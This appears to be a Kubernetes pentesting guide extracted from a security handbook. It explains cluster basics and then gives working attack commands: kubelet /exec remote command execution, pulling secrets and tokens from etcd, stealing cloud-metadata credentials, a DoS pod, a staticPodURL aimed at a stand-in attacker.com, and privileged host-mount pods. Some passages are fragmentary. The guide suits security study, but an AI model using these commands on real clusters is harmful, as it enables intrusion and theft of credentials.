StatefulSet: This component is meant specifically for applications like databases which need to access the same storage.
Ingress: This is the configuration that is used to expose the application publicly with a URL. Note that this can also be done using external services, but this is the correct way to expose the application.
If you implement an Ingress you will need to create Ingress Controllers. The Ingress Controller is a pod that will be the endpoint that receives the requests, checks them and load balances them to the services. The ingress controller will send the request based on the ingress rules configured. Note that the ingress rules can point different paths or even subdomains to different internal kubernetes services.
A better security practice would be to use a cloud load balancer or a proxy server as entrypoint so that no part of the Kubernetes cluster is exposed.
When a request that doesn't match any ingress rule is received, the ingress controller will direct it to the "Default backend". You can describe the ingress controller to get the address of this parameter.
minikube addons enable ingress
$ minikube status
host: Running
kubelet: Running
apiserver: Running
kubeconfig: Configured
$ minikube delete
Deleting "minikube" in virtualbox ...
Removed all traces of the "minikube" cluster
Kubectl Basics
Kubectl is the command line tool for kubernetes clusters. It communicates with the Api server of the master process to perform actions in kubernetes or to ask for data.
kubectl version #Get client and server version
kubectl get pod
kubectl get services
kubectl get deployment
kubectl get replicaset
kubectl get secret
kubectl get all
kubectl get ingress
kubectl get endpoints
Minikube Dashboard
The dashboard allows you to see more easily what minikube is running; you can find the URL to access it with minikube dashboard --url
This service will be accessible externally (check the nodePort and type: LoadBalancer attributes):
---
apiVersion: v1
kind: Service
metadata:
name: mongo-express-service
spec:
selector:
app: mongo-express
type: LoadBalancer
ports:
- protocol: TCP
port: 8081
targetPort: 8081
nodePort: 30000
This is useful for testing but for production you should have only internal
services and an Ingress to expose the application.
Example of Ingress config file
apiVersion: networking.k8s.io/v1
kind: Ingress
metadata:
name: dashboard-ingress
namespace: kubernetes-dashboard
spec:
rules:
- host: dashboard.com
http:
paths:
- backend:
serviceName: kubernetes-dashboard
servicePort: 80
Note how the passwords are encoded in B64 (which isn't secure!)
apiVersion: v1
kind: Secret
metadata:
name: mongodb-secret
type: Opaque
data:
mongo-root-username: dXNlcm5hbWU=
mongo-root-password: cGFzc3dvcmQ=
Example of ConfigMap
A ConfigMap is the configuration that is given to the pods so they know
how to locate and access other services. In this case, each pod will know
that the name mongodb-service is the address of a pod that they can
communicate with (this pod will be executing a mongodb):
apiVersion: v1
kind: ConfigMap
metadata:
name: mongodb-configmap
data:
database_url: mongodb-service
Namespaces
Kubernetes supports multiple virtual clusters backed by the same physical cluster. These virtual clusters are called namespaces. They are intended for use in environments with many users spread across multiple teams or projects. For clusters with a few to tens of users, you should not need to create or think about namespaces at all. You should only start using namespaces to have better control and organization of each part of the application deployed in kubernetes.
kube-system: It's not meant for user use and you shouldn't touch it. It's for master and kubectl processes.
kube-public: Publicly accessible data. Contains a configmap which contains cluster information
kube-node-lease: Determines the availability of a node
default: The namespace the user will use to create resources
#Create namespace
kubectl create namespace my-namespace
Note that most Kubernetes resources (e.g. pods, services, replication controllers, and others) are in some namespace. However, other resources like namespace resources and low-level resources, such as nodes and persistentVolumes, are not in a namespace. To see which Kubernetes resources are and aren't in a namespace:
You can save the namespace for all subsequent kubectl commands in that context.
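A minimal sketch of both commands referenced above:
# Resources that live inside a namespace vs cluster-wide resources
kubectl api-resources --namespaced=true
kubectl api-resources --namespaced=false
# Set the default namespace for all subsequent kubectl commands in the current context
kubectl config set-context --current --namespace=my-namespace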
Helm
Helm is the package manager for Kubernetes. It allows packaging YAML files and distributing them in public and private repositories. These packages are called Helm Charts.
Helm is also a template engine that allows generating config files with variables:
Kubernetes secrets
A Secret is an object that contains sensitive data such as a password, a
token or a key. Such information might otherwise be put in a Pod
specification or in an image. Users can create Secrets and the system also
creates Secrets. The name of a Secret object must be a valid DNS
subdomain name. Read here the official documentation.
The Opaque type is the default one, the typical key-value pair defined
by users.
secretpod.yaml
apiVersion: v1
kind: Secret
metadata:
name: mysecret
type: Opaque
data:
username: YWRtaW4=
password: MWYyZDFlMmU2N2Rm
---
apiVersion: v1
kind: Pod
metadata:
name: secretpod
spec:
containers:
- name: secretpod
image: nginx
env:
- name: SECRET_USERNAME
valueFrom:
secretKeyRef:
name: mysecret
key: username
- name: SECRET_PASSWORD
valueFrom:
secretKeyRef:
name: mysecret
key: password
volumeMounts:
- name: foo
mountPath: "/etc/foo"
restartPolicy: Never
volumes:
- name: foo
secret:
secretName: mysecret
items:
- key: username
path: my-group/my-username
mode: 0640
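A minimal usage sketch of the manifest above: create the objects and check how the secret reaches the pod both as env variables and as mounted files:
kubectl apply -f secretpod.yaml
kubectl exec secretpod -- sh -c 'env | grep SECRET_; cat /etc/foo/my-group/my-username'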
Secrets in etcd
etcd is a consistent and highly-available key-value store used as the Kubernetes backing store for all cluster data. Let's access the secrets stored in etcd:
You will see where certs, keys and URLs are located in the FS. Once you get them, you will be able to connect to etcd.
#ETCDCTL_API=3 etcdctl --cert <path to client.crt> --key <path
to client.ket> --cacert <path to CA.cert> endpoint=[<ip:port>]
health
Once you manage to establish communication you will be able to get the
secrets:
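For example, something along these lines (a sketch using the same etcdctl client; certificate paths, endpoint and the secret name are placeholders):
ETCDCTL_API=3 etcdctl --cert <client.crt> --key <client.key> --cacert <CA.cert> --endpoints=<ip:port> get /registry/secrets --prefix --keys-only
# Read one specific secret (stored in plain text by default)
ETCDCTL_API=3 etcdctl --cert <client.crt> --key <client.key> --cacert <CA.cert> --endpoints=<ip:port> get /registry/secrets/kube-system/<secret-name>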
By default all the secrets are stored in plain text inside etcd unless you
apply an encryption layer. The following example is based on
https://kubernetes.io/docs/tasks/administer-cluster/encrypt-data/
encryption.yaml
apiVersion: apiserver.config.k8s.io/v1
kind: EncryptionConfiguration
resources:
  - resources:
    - secrets
    providers:
    - aescbc:
        keys:
        - name: key1
          secret: cjjPMcWpTPKhAdieVtd+KhG4NN+N6e3NmBPMXJvbfrY= # Any random key
    - identity: {}
containers:
- command:
  - kube-apiserver
  - --encryption-provider-config=/etc/kubernetes/etcd/<configFile.yaml>
  volumeMounts:
  - mountPath: /etc/kubernetes/etcd
    name: etcd
    readOnly: true
Scroll down in the volumeMounts to hostPath:
- hostPath:
    path: /etc/kubernetes/etcd
    type: DirectoryOrCreate
  name: etcd
Final tips:
Try not to keep secrets in the FS, get them from other places.
Check out https://www.vaultproject.io/ to add more protection to your secrets.
https://kubernetes.io/docs/concepts/configuration/secret/#risks
https://docs.cyberark.com/Product-Doc/OnlineHelp/AAM-DAP/11.2/en/Content/Integrations/Kubernetes_deployApplicationsConjur-k8s-Secrets.htm
References
https://sickrov.github.io/
https://www.youtube.com/watch?v=X48VuDVv0do
exposing-services-in-kubernetes.md
Finding Exposed pods via port
scanning
The following ports might be open in a Kubernetes cluster:
Port             Process         Description
443/TCP          kube-apiserver  Kubernetes API port
2379/TCP         etcd
6666/TCP         etcd            etcd
4194/TCP         cAdvisor        Container metrics
6443/TCP         kube-apiserver  Kubernetes API port
8443/TCP         kube-apiserver  Minikube API port
8080/TCP         kube-apiserver  Insecure API port
10250/TCP        kubelet         HTTPS API which allows full mode access
10255/TCP        kubelet         Unauthenticated read-only HTTP port: pods, running pods and node state
10256/TCP        kube-proxy      Kube Proxy health check server
9099/TCP         calico-felix    Health check server for Calico
6782-6784/TCP    weave           Metrics and endpoints
30000-32767/TCP  NodePort        Proxy to the services
44134/TCP        Tiller          Helm service listening
Nmap
nmap -n -T4 -p 443,2379,6666,4194,6443,8443,8080,10250,10255,10256,9099,6782-6784,30000-32767,44134 <pod_ipaddress>/16
Kube-apiserver
This is the Kubernetes API service that administrators usually talk to
using the tool kubectl .
Common ports: 6443 and 443, but also 8443 in minikube and 8080 as
insecure.
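A quick unauthenticated check could look like this (a sketch; the /version endpoint is usually reachable anonymously, while most other paths should return 401/403 unless anonymous access is over-privileged):
curl -k https://<apiserver_ip>:6443/version
curl -k https://<apiserver_ip>:6443/api/v1/namespaces/default/pods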
Check the following page to learn how to obtain sensitive data and
perform sensitive actions talking to this service:
kubernetes-enumeration.md
Kubelet API
This service runs on every node of the cluster. It's the service that
controls the pods inside the node. It talks to the kube-apiserver.
If you find this service exposed you might have found an unauthenticated
RCE.
Kubelet API
If you can list nodes you can get a list of kubelets endpoints with:
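One way to do that (a sketch using kubectl custom-columns; adjust for your cluster):
kubectl get nodes -o custom-columns='NAME:.metadata.name,IP:.status.addresses[0].address,KUBELET_PORT:.status.daemonEndpoints.kubeletEndpoint.Port'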
etcd API
curl -k https://<IP address>:2379
curl -k https://<IP address>:2379/version
etcdctl --endpoints=http://<MASTER-IP>:2379 get / --prefix --keys-only
Tiller
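If Tiller (Helm v2) is listening on 44134 you could try to talk to it with a Helm 2 client (a sketch; the --host flag belongs to Helm v2 only):
helm --host <node_ip>:44134 version
helm --host <node_ip>:44134 ls   # list deployed releases if the port is open and unauthenticated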
cAdvisor
Service useful to gather metrics.
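If the port is open, metrics can typically be pulled directly (a sketch; cAdvisor historically listened on 4194 over plain HTTP):
curl -s http://<node_ip>:4194/metrics | head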
NodePort
When a port is exposed on all the nodes via a NodePort, the same port is
opened in all the nodes, proxying the traffic into the declared Service. By
default this port will be in the range 30000-32767. So new unchecked
services might be accessible through those ports.
If etcd can be accessed anonymously, you may need to use the
etcdctl tool; the etcdctl command shown above will retrieve all the stored keys.
Kubelet RCE
The Kubelet documentation explains that by default anonymous access
to the service is allowed:
kubelet-authentication-and-authorization.md
The Kubelet service API is not documented, but the source code can be
found here and finding the exposed endpoints is as easy as running:
curl -s https://raw.githubusercontent.com/kubernetes/kubernetes/master/pkg/kubelet/server/server.go | grep 'Path("/'
Path("/pods").
Path("/run")
Path("/exec")
Path("/attach")
Path("/portForward")
Path("/containerLogs")
Path("/runningpods/").
/pods
This endpoint lists pods and their containers:
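For instance (a sketch reusing the same example host as the /exec request below):
curl -ks https://worker:10250/pods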
/exec
This endpoint allows to execute code inside any container very easily:
# The command is passed as an array (split by spaces) and it is a GET request.
curl -Gks https://worker:10250/exec/{namespace}/{pod}/{container} \
  -d 'input=1' -d 'output=1' -d 'tty=1' \
  -d 'command=ls' -d 'command=/'
To automate the exploitation you can also use the script kubelet-anon-rce.
To avoid this attack the kubelet service should be run with --anonymous-auth=false
and the service should be segregated at the network level.
For example, a remote attacker can abuse the read-only port by accessing the
following URL: http://<external-IP>:10255/pods
References
https://www.cyberark.com/resources/threat-research-blog/kubernetes-pentest-methodology-part-2
https://labs.f-secure.com/blog/attacking-kubernetes-through-kubelet
"authentication": {
"anonymous": {
"enabled": true
},
The kubelet calls the TokenReview API on the configured API server to
determine user information from bearer tokens
"authentication": {
"x509": {
"clientCAFile": "/etc/kubernetes/pki/ca.crt"
}
}
Kubelet Authorization
Any request that is successfully authenticated (including an anonymous
request) is then authorized. The default authorization mode is
AlwaysAllow , which allows all requests.
However, the other possible value is webhook (which is what you will be
mostly finding out there). This mode will check the permissions of the
authenticated user to allow or disallow an action.
"authorization": {
"mode": "Webhook",
"webhook": {
"cacheAuthorizedTTL": "5m0s",
"cacheUnauthorizedTTL": "30s"
}
},
HTTP verb   Request verb
POST        create
GET, HEAD   get (for individual resources), list (for collections, including full object content), watch (for watching an individual resource or collection of resources)
PUT         update
PATCH       patch
DELETE      delete (for individual resources), deletecollection (for collections)
For example, the following request tried to access the pods info of kubelet
without permission:
curl -k --header "Authorization: Bearer ${TOKEN}" 'https://172.31.28.172:10250/pods'
Forbidden (user=system:node:ip-172-31-28-172.ec2.internal, verb=get, resource=nodes, subresource=proxy)
Automatic Enumeration
Before starting enumerating the ways K8s offers to expose services to the
public, know that if you can list namespaces, services and ingresses, you
can find everything exposed to the public with:
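A minimal sketch of that enumeration with kubectl (assuming you have list permissions on those resources):
kubectl get namespaces
kubectl get services --all-namespaces -o wide
kubectl get ingresses --all-namespaces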
ClusterIP
A ClusterIP service is the default Kubernetes service. It gives you a
service inside your cluster that other apps inside your cluster can access.
There is no external access.
Now, you can navigate through the Kubernetes API to access services using
this scheme:
http://localhost:8080/api/v1/proxy/namespaces/<NAMESPACE>/services/<SERVICE-NAME>:<PORT-NAME>/
NodePort
NodePort opens a specific port on all the Nodes (the VMs), and any
traffic that is sent to this port is forwarded to the service. This is usually a
really bad option.
If you don't specify the nodePort in the yaml (it's the port that will be
opened), a port in the range 30000–32767 will be used.
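A minimal NodePort Service sketch (names and ports below are illustrative, not from the original text):
apiVersion: v1
kind: Service
metadata:
  name: my-nodeport-service
spec:
  type: NodePort
  selector:
    app: MyApp
  ports:
  - port: 80
    targetPort: 9376
    nodePort: 30007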
LoadBalancer
Exposes the Service externally using a cloud provider's load balancer.
On GKE, this will spin up a Network Load Balancer that will give you a
single IP address that will forward all traffic to your service.
You have to pay for a LoadBalancer per exposed service, which can get
expensive.
ExternalName
Services of type ExternalName map a Service to a DNS name, not to a
typical selector such as my-service or cassandra . You specify these
Services with the spec.externalName parameter.
This Service definition, for example, maps the my-service Service in the
prod namespace to my.database.example.com :
apiVersion: v1
kind: Service
metadata:
  name: my-service
  namespace: prod
spec:
  type: ExternalName
  externalName: my.database.example.com
External IPs
Traffic that ingresses into the cluster with the external IP (as destination
IP), on the Service port, will be routed to one of the Service endpoints.
externalIPs are not managed by Kubernetes and are the responsibility of
the cluster administrator.
In the Service spec, externalIPs can be specified along with any of the
ServiceTypes . In the example below, " my-service " can be accessed by
clients on " 80.11.12.10:80 "( externalIP:port )
apiVersion: v1
kind: Service
metadata:
  name: my-service
spec:
  selector:
    app: MyApp
  ports:
  - name: http
    protocol: TCP
    port: 80
    targetPort: 9376
  externalIPs:
  - 80.11.12.10
Ingress
Unlike all the above examples, Ingress is NOT a type of service. Instead,
it sits in front of multiple services and acts as a "smart router" or
entrypoint into your cluster.
You can do a lot of different things with an Ingress, and there are many
types of Ingress controllers that have different capabilities.
The default GKE ingress controller will spin up a HTTP(S) Load Balancer
for you. This will let you do both path based and subdomain based routing
to backend services. For example, you can send everything on
foo.yourdomain.com to the foo service, and everything under the
yourdomain.com/bar/ path to the bar service.
The YAML for an Ingress object on GKE with an L7 HTTP Load Balancer
might look like this:
apiVersion: extensions/v1beta1
kind: Ingress
metadata:
  name: my-ingress
spec:
  backend:
    serviceName: other
    servicePort: 8080
  rules:
  - host: foo.mydomain.com
    http:
      paths:
      - backend:
          serviceName: foo
          servicePort: 8080
  - host: mydomain.com
    http:
      paths:
      - path: /bar/*
        backend:
          serviceName: bar
          servicePort: 8080
References
https://medium.com/google-cloud/kubernetes-nodeport-vs-loadbalancer-vs-ingress-when-should-i-use-what-922f010849e0
https://kubernetes.io/docs/concepts/services-networking/service/
https://book.hacktricks.xyz/linux-hardening/privilege-escalation
You can check these docker breakouts to try to escape from a pod you have
compromised:
https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout
kubernetes-enumeration.md
Usually the pods are run with a service account token inside of them. This
service account may have some privileges attached to it that you could
abuse to move to other pods or even to escape to the nodes configured
inside the cluster. Check how in:
abusing-roles-clusterroles-in-kubernetes
Services
For this purpose, you can try to get all the services of the kubernetes
environment:
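For example (a sketch; requires list permission on services):
kubectl get services --all-namespaces -o wide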
Scanning
The following Bash script (taken from a Kubernetes workshop) will install
and scan the IP ranges of the kubernetes cluster:
sudo apt-get update
sudo apt-get install nmap

nmap-kube () {
    nmap --open -T4 -A -v -Pn -p 80,443,2379,8080,9090,9100,9093,4001,6782-6784,6443,8443,9099,10250,10255,10256 "${@}"
}

nmap-kube-discover () {
    local LOCAL_RANGE=$(ip a | awk '/eth0$/{print $2}' | sed 's,[0-9][0-9]*/.*,*,');
    local SERVER_RANGES=" ";
    SERVER_RANGES+="10.0.0.1 ";
    SERVER_RANGES+="10.0.1.* ";
    SERVER_RANGES+="10.*.0-1.* ";
    nmap-kube ${SERVER_RANGES} "${LOCAL_RANGE}"
}
nmap-kube-discover
Check out the following page to learn how you could attack Kubernetes
specific services to compromise other pods/all the environment:
pentesting-kubernetes-services.md
Sniffing
In case the compromised pod is running some sensitive service where
other pods need to authenticate, you might be able to obtain the credentials
sent from the other pods by sniffing local communications.
Network Spoofing
By default, techniques like ARP spoofing (and thanks to that, DNS
spoofing) work in the Kubernetes network. Then, inside a pod, if you have the
NET_RAW capability (which is there by default), you will be able to send
custom crafted network packets and perform MitM attacks via ARP
spoofing against all the pods running in the same node. Moreover, if the
malicious pod is running in the same node as the DNS server, you will be
able to perform a DNS spoofing attack against all the pods in the cluster.
kubernetes-network-attacks.md
Node DoS
If there is no resource specification in the Kubernetes manifests and no
limit ranges applied to the containers, as attackers we can consume all
the resources of the node where the pod/deployment is running, starve other
resources and cause a DoS in the environment.
You can see the difference in resource consumption while running a tool such
as stress-ng and after stopping it.
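A quick way to generate that load from inside the cluster could look like this (a sketch; the polinux/stress image and the flags below are illustrative assumptions):
# Hypothetical resource-exhaustion pod
kubectl run resource-hog --image=polinux/stress --restart=Never --command -- stress --vm 2 --vm-bytes 1G --cpu 2 --timeout 300s
# Compare node usage before/after (requires metrics-server)
kubectl top node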
/var/lib/kubelet/kubeconfig
/var/lib/kubelet/kubelet.conf
/var/lib/kubelet/config.yaml
/var/lib/kubelet/kubeadm-flags.env
/etc/kubernetes/kubelet-kubeconfig
Steal Secrets
# Check Kubelet privileges
kubectl --kubeconfig /var/lib/kubelet/kubeconfig auth can-i create pod -n kube-system
The script can-they.sh will automatically get the tokens of other pods and
check if they have the permission you are looking for (instead of checking
them one by one):
Privileged DaemonSets
A DaemonSet is a pod that will be run in all the nodes of the cluster.
Therefore, if a DaemonSet is configured with a privileged service account,
in ALL the nodes you are going to be able to find the token of that
privileged service account that you could abuse.
The exploit is the same one as in the previous section, but you now don't
depend on luck.
Pivot to Cloud
If the cluster is managed by a cloud service, usually the Node will have a
different access to the metadata endpoint than the Pod. Therefore, try to
access the metadata endpoint from the node (or from a pod with
hostNetwork set to true):
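For example (a sketch; which endpoint applies depends on the cloud provider):
# GCP
curl -s -H "Metadata-Flavor: Google" "http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token"
# AWS (IMDSv1)
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/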
kubernetes-pivoting-to-clouds.md
Steal etcd
If you can specify the nodeName of the Node that will run the container,
get a shell inside a control-plane node and get the etcd database:
control-plane nodes have the role master and in cloud managed clusters
you won't be able to run anything in them.
Read secrets from etcd
If you can run your pod on a control-plane node using the nodeName
selector in the pod spec, you might have easy access to the etcd database,
which contains all of the configuration for the cluster, including all secrets.
Below is a quick and dirty way to grab secrets from etcd if it is running
on the control-plane node you are on. If you want a more elegant solution
that spins up a pod with the etcd client utility etcdctl and uses the
control-plane node's credentials to connect to etcd wherever it is running,
check out this example manifest from @mauilion.
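The location of the etcd data directory can usually be recovered from the running process or the static manifest (a sketch; paths may differ per distribution):
ps -ef | grep etcd | tr ' ' '\n' | grep -- --data-dir
# or
grep data-dir /etc/kubernetes/manifests/etcd.yaml 2>/dev/null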
Output:
data-dir=/var/lib/etcd
Extract the tokens from the database and show the service account
name
db=`strings /var/lib/etcd/member/snap/db`; for x in `echo "$db" | grep eyJhbGciOiJ`; do name=`echo "$db" | grep $x -B40 | grep registry`; echo $name \| $x; echo; done
Same command, but some greps to only return the default token in the
kube-system namespace
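A sketch of that refinement (the same one-liner with additional greps appended):
db=`strings /var/lib/etcd/member/snap/db`; for x in `echo "$db" | grep eyJhbGciOiJ`; do name=`echo "$db" | grep $x -B40 | grep registry`; echo $name \| $x; echo; done | grep kube-system | grep default-token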
Output:
1/registry/secrets/kube-system/default-token-d82kb |
eyJhbGciOiJSUzI1NiIsImtpZCI6IkplRTc0X2ZP[REDACTED]
Therefore, static Pods are always bound to one Kubelet on a specific node.
The kubelet automatically tries to create a mirror Pod on the
Kubernetes API server for each static Pod. This means that the Pods
running on a node are visible on the API server, but cannot be controlled
from there. The Pod names will be suffixed with the node hostname with a
leading hyphen.
The spec of a static Pod cannot refer to other API objects (e.g.,
ServiceAccount, ConfigMap, Secret, etc.). So you cannot abuse this
behaviour to launch a pod with an arbitrary serviceAccount in the
current node to compromise the cluster. But you could use this to run pods
in different namespaces (in case that's useful for some reason).
If you are inside the node host you can make it create a static pod inside
itself. This is pretty useful because it might allow you to create a pod in a
different namespace like kube-system.
In order to create a static pod, the docs are a great help. You basically need
2 things:
Modify the param staticPodURL from kubelet config file and set
something like staticPodURL: http://attacker.com:8765/pod.yaml .
This will make the kubelet process create a static pod getting the
configuration from the indicated URL.
apiVersion: v1
kind: Pod
metadata:
  name: bad-priv2
  namespace: kube-system
spec:
  hostPID: true
  containers:
  - name: bad
    image: gcr.io/shmoocon-talk-hacking/brick
    stdin: true
    tty: true
    imagePullPolicy: IfNotPresent
    volumeMounts:
    - mountPath: /chroot
      name: host
    securityContext:
      privileged: true
  volumes:
  - name: host
    hostPath:
      path: /
      type: Directory
In this folder you might find config files with tokens and configurations
to connect to the API server. In this folder you can also find a cache
folder with information previously retrieved.
/run/secrets/kubernetes.io/serviceaccount
/var/run/secrets/kubernetes.io/serviceaccount
/secrets/kubernetes.io/serviceaccount
Now that you have the token, you can find the API server address inside
environment variables such as KUBERNETES_SERVICE_HOST and
KUBERNETES_SERVICE_PORT. For more info run (env || set) | grep -i kube
The service account token is being signed by the key residing in the file
sa.key and validated by sa.pub.
/etc/kubernetes/pki
/var/lib/localkube/certs
Hot Pods
Hot pods are pods containing a privileged service account token. A
privileged service account token is a token that has permission to do
privileged tasks such as listing secrets, creating pods, etc.
RBAC
If you don't know what is RBAC, read this section.
Enumeration CheatSheet
In order to enumerate a K8s environment you need a couple of things:
With those details you can enumerate kubernetes. If the API for some
reason is accessible through the Internet, you can just download that info
and enumerate the platform from your host.
If you have the list permission, you are allowed to execute API requests
to list a type of asset ( get option in kubectl ):
#In a namespace
GET /apis/apps/v1/namespaces/{namespace}/deployments
#In all namespaces
GET /apis/apps/v1/deployments
If you have the watch permission, you are allowed to execute API
requests to monitor assets:
GET /apis/apps/v1/deployments?watch=true
GET /apis/apps/v1/watch/namespaces/{namespace}/deployments?
watch=true
GET
/apis/apps/v1/watch/namespaces/{namespace}/deployments/{name}
[DEPRECATED]
GET /apis/apps/v1/watch/namespaces/{namespace}/deployments
[DEPRECATED]
GET /apis/apps/v1/watch/deployments [DEPRECATED]
They open a streaming connection that returns you the full manifest of a
Deployment whenever it changes (or when a new one is created).
The following kubectl commands just indicate how to list the objects. If
you want to access the data you need to use describe instead of get .
Using curl
From inside a pod you can use several env variables:
export APISERVER=${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}
export SERVICEACCOUNT=/var/run/secrets/kubernetes.io/serviceaccount
export NAMESPACE=$(cat ${SERVICEACCOUNT}/namespace)
export TOKEN=$(cat ${SERVICEACCOUNT}/token)
export CACERT=${SERVICEACCOUNT}/ca.crt
alias kurl="curl --cacert ${CACERT} --header \"Authorization: Bearer ${TOKEN}\""
# If kurl still gets a cert error, use the -k option to solve it.
By default the pod can access the kube-api server at the domain name
kubernetes.default.svc and you can see the kube network configuration in
/etc/resolv.conf, as here you will find the address of the Kubernetes
DNS server (the ".1" of the same range is the kube-api endpoint).
Using kubectl
Having the token and the address of the API server you use kubectl or curl
to access it as indicated here:
You can find an official kubectl cheatsheet here. The goal of the following
sections is to present in ordered manner different options to enumerate and
understand the new K8s you have obtained access to.
To find the HTTP request that kubectl sends you can use the parameter
-v=8
Current Configuration
Kubectl
# Change namespace
kubectl config set-context --current --namespace=<namespace>
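To review the configuration kubectl is currently using (standard kubectl commands, not shown in the original text):
kubectl config view
kubectl config get-contexts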
If you managed to steal some users credentials you can configure them
locally using something like:
kubectl config set-credentials USER_NAME \
  --auth-provider=oidc \
  --auth-provider-arg=idp-issuer-url=( issuer url ) \
  --auth-provider-arg=client-id=( your client id ) \
  --auth-provider-arg=client-secret=( your client secret ) \
  --auth-provider-arg=refresh-token=( your refresh token ) \
  --auth-provider-arg=idp-certificate-authority=( path to your ca certificate ) \
  --auth-provider-arg=id-token=( your id_token )
kubectl
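A sketch of the kubectl equivalent for checking your own permissions:
kubectl auth can-i --list
kubectl auth can-i --list -n kube-system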
API
kurl -i -s -k -X $'POST' \
    -H $'Content-Type: application/json' \
    --data-binary $'{\"kind\":\"SelfSubjectRulesReview\",\"apiVersion\":\"authorization.k8s.io/v1\",\"metadata\":{\"creationTimestamp\":null},\"spec\":{\"namespace\":\"default\"},\"status\":{\"resourceRules\":null,\"nonResourceRules\":null,\"incomplete\":false}}\x0a' \
    "https://$APISERVER/apis/authorization.k8s.io/v1/selfsubjectrulesreviews"
kubernetes-role-based-access-control-rbac.md
Once you know which privileges you have, check the following page to
figure out if you can abuse them to escalate privileges:
abusing-roles-clusterroles-in-kubernetes
k get roles
k get clusterroles
API
kurl -k -v "https://$APISERVER/apis/rbac.authorization.k8s.io/v1/namespaces/eevee/roles?limit=500"
kurl -k -v "https://$APISERVER/apis/rbac.authorization.k8s.io/v1/clusterroles?limit=500"
Get namespaces
Kubernetes supports multiple virtual clusters backed by the same physical
cluster. These virtual clusters are called namespaces.
kubectl
k get namespaces
API
kurl -k -v https://$APISERVER/api/v1/namespaces/
Get secrets
kubectl
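A sketch of the kubectl equivalents:
k get secrets -o yaml
k get secrets -o yaml -n custnamespace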
API
kurl -v https://$APISERVER/api/v1/namespaces/default/secrets/
kurl -v
https://$APISERVER/api/v1/namespaces/custnamespace/secrets/
If you can read secrets you can use the following lines to get the privileges
related to each token:
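A minimal sketch of that check (it decodes each service-account token found in the secrets and asks the API server what that token can do):
for tok in $(k get secrets -o jsonpath='{.items[*].data.token}'); do
  echo "===== next token ====="
  k auth can-i --list --token=$(echo "$tok" | base64 -d)
done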
Get Service Accounts
kubectl
k get serviceaccounts
API
kurl -k -v
https://$APISERVER/api/v1/namespaces/{namespace}/serviceaccount
s
Get Deployments
The deployments specify the components that need to be run.
kubectl
k get deployments
k get deployments -n custnamespace
API
kurl -v https://$APISERVER/apis/apps/v1/namespaces/<namespace>/deployments/
Get Pods
The Pods are the actual containers that will run.
kubectl
k get pods
k get pods -n custnamespace
API
kurl -v https://$APISERVER/api/v1/namespaces/<namespace>/pods/
Get Services
Kubernetes services are used to expose a service on a specific port and IP
(which will act as a load balancer to the pods that are actually offering the
service). This is interesting in order to know where you can find other services
to try to attack.
kubectl
k get services
k get services -n custnamespace
API
kurl -v https://$APISERVER/api/v1/namespaces/default/services/
Get nodes
Get all the nodes configured inside the cluster.
kubectl
k get nodes
API
kurl -v https://$APISERVER/api/v1/nodes/
Get DaemonSets
DaemonSets allow ensuring that a specific pod is running in all the
nodes of the cluster (or in the ones selected). If you delete the DaemonSet,
the pods managed by it will also be removed.
kubectl
k get daemonsets
API
kurl -v https://$APISERVER/apis/extensions/v1beta1/namespaces/default/daemonsets
Get cronjob
Cron jobs allow scheduling, using crontab-like syntax, the launch of a pod
that will perform some action.
kubectl
k get cronjobs
API
kurl -v https://$APISERVER/apis/batch/v1beta1/namespaces/<namespace>/cronjobs
Get "all"
kubectl
k get all
Get namespaced resources
kubectl
k api-resources --namespaced=true
The verbs field is an array that contains the allowed verbs. A verb in
Kubernetes defines the type of action you need to apply to the
resource. For example, the list verb is used against collections while
"get" is used against a single resource.
Rules Verbs
(This info was taken from here)
HTTP verb   Request verb
POST        create
GET, HEAD   get (for individual resources), list (for collections, including full object content), watch (for watching an individual resource or collection of resources)
PUT         update
PATCH       patch
DELETE      delete (for individual resources), deletecollection (for collections)
PodSecurityPolicy
use verb on podsecuritypolicies resources in the policy
API group.
RBAC
bind and escalate verbs on roles and clusterroles
You can find all the verbs that each resource supports by executing kubectl api-resources --sort-by name -o wide
Examples
Role
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  namespace: defaultGreen
  name: pod-and-pod-logs-reader
rules:
- apiGroups: [""]
  resources: ["pods", "pods/log"]
  verbs: ["get", "list", "watch"]
ClusterRole
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  # "namespace" omitted since ClusterRoles are not namespaced
  name: secret-reader
rules:
- apiGroups: [""]
  resources: ["secrets"]
  verbs: ["get", "watch", "list"]
For example you can use a ClusterRole to allow a particular user to run:
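For instance (an illustrative command; binding a ClusterRole cluster-wide lets the subject act across all namespaces):
kubectl get pods --all-namespaces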
RoleBinding
apiVersion: rbac.authorization.k8s.io/v1
# This role binding allows "jane" to read pods in the "default" namespace.
# You need to already have a Role named "pod-reader" in that namespace.
kind: RoleBinding
metadata:
  name: read-pods
  namespace: default
subjects:
# You can specify more than one "subject"
- kind: User
  name: jane # "name" is case sensitive
  apiGroup: rbac.authorization.k8s.io
roleRef:
  # "roleRef" specifies the binding to a Role / ClusterRole
  kind: Role # this must be Role or ClusterRole
  name: pod-reader # this must match the name of the Role or ClusterRole you wish to bind to
  apiGroup: rbac.authorization.k8s.io
ClusterRoleBinding
apiVersion: rbac.authorization.k8s.io/v1
# This cluster role binding allows anyone in the "manager" group to read secrets in any namespace.
kind: ClusterRoleBinding
metadata:
  name: read-secrets-global
subjects:
- kind: Group
  name: manager # Name is case sensitive
  apiGroup: rbac.authorization.k8s.io
roleRef:
  kind: ClusterRole
  name: secret-reader
  apiGroup: rbac.authorization.k8s.io
# List Roles
kubectl get roles
kubectl describe roles
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRole
metadata:
  name: api-resource-verbs-all
rules:
- apiGroups: ["*"]
  resources: ["*"]
  verbs: ["*"]
So just create the malicious pod and expect the secrets in port 6666:
super_privs.yaml
apiVersion: v1
kind: Pod
metadata:
  name: ubuntu
  labels:
    app: ubuntu
spec:
  # Uncomment and specify a specific node you want to debug
  # nodeName: <insert-node-name-here>
  containers:
  - image: ubuntu
    command:
    - "sleep"
    - "3600" # adjust this as needed -- use only as long as you need
    imagePullPolicy: IfNotPresent
    name: ubuntu
    securityContext:
      allowPrivilegeEscalation: true
      privileged: true
      #capabilities:
      #  add: ["NET_ADMIN", "SYS_ADMIN"] # add the capabilities you need https://man7.org/linux/man-pages/man7/capabilities.7.html
      runAsUser: 0 # run as root (or any other user)
    volumeMounts:
    - mountPath: /host
